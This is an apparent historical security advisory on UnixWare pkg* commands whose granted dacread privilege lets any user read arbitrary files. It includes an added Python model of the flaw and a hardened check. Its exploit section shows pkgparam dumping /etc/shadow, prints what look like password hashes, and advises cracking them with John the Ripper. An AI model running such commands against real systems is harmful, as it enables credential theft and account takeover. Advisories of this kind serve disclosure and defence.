As we wrote before, UnixWare binaries gain additional privileges via standard suid/sgid and /etc/security/tcb/privs. Most of the UnixWare "pkg" commands (pkginfo, pkgcat, pkgparam, etc.) are vulnerable to a bug that allows any user to read arbitrary files on the system, as a result of the additional "dacread" permission granted to them in the privs file.
Credit:
The information has been provided by: Brock Tellier.
The dacread permission allows a process to override the Discretionary Access Controls (DAC) for read-only operations. Basically, a process with the dacread permission is able to bypass the mode bits and ownership on a file, but only for reading it. A process with the dacwrite permission can bypass the mode bits to write to or execute that file.
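As an added illustration (not part of the original advisory), the following Python model shows how a dacread override differs from a plain DAC check, and the check a privileged program should make before opening a caller-supplied path. The files, process, privilege sets and contents are constructed, and the model simplifies UnixWare's real privilege mechanism.

```python
from dataclasses import dataclass, field
READ, WRITE, EXEC = 4, 2, 1  # access bits as in a mode triple (rwx)

@dataclass
class FileNode:
    owner: int
    group: int
    mode: int   # permission bits only, e.g. 0o400
    data: str

@dataclass
class Process:
    uid: int
    gids: set
    privs: set = field(default_factory=set)  # e.g. {"dacread"} granted via the privs file

def dac_allows(proc, node, want):
    """Plain DAC: select the owner/group/other triple and test the requested bit."""
    if proc.uid == node.owner:
        bits = (node.mode >> 6) & 7
    elif node.group in proc.gids:
        bits = (node.mode >> 3) & 7
    else:
        bits = node.mode & 7
    return bits & want == want

def priv_allows(proc, node, want):
    """DAC plus the overrides described above (a simplified model, not UnixWare's code):
    dacread bypasses DAC for reads only, dacwrite for write and execute."""
    if dac_allows(proc, node, want):
        return True
    return ("dacread" if want == READ else "dacwrite") in proc.privs

def naive_read(proc, node):
    """Vulnerable pattern: open a caller-supplied path relying on the fixed privilege."""
    if not priv_allows(proc, node, READ):
        raise PermissionError("read denied")
    return node.data

def checked_read(proc, node):
    """Hardened pattern: require that the caller could read the file with plain DAC
    (i.e. ignoring the privilege) before performing the privileged open."""
    if not dac_allows(Process(proc.uid, proc.gids), node, READ):
        raise PermissionError("caller lacks DAC read access")
    return naive_read(proc, node)

SHADOW = FileNode(owner=0, group=3, mode=0o400, data="<constructed shadow contents>")  # constructed sample
PASSWD = FileNode(owner=0, group=3, mode=0o644, data="<constructed passwd contents>")  # constructed sample
USER_WITH_DACREAD = Process(uid=1001, gids={100}, privs={"dacread"})  # unprivileged user running pkgparam
```

With these objects, naive_read hands the unprivileged user the mode 0400 file (the bug), while checked_read refuses it but still serves the world-readable file.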
Exploit:
The worst offender among the pkg* programs is pkgparam, which will print the contents of a file to stdout, though most of the pkg programs can be forced to read from /etc/shadow in one way or another, and the contents can be grabbed with truss.
bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$
Now just concatenate the first field of /etc/passwd with this file and run your favorite cracker (for example, John the Ripper).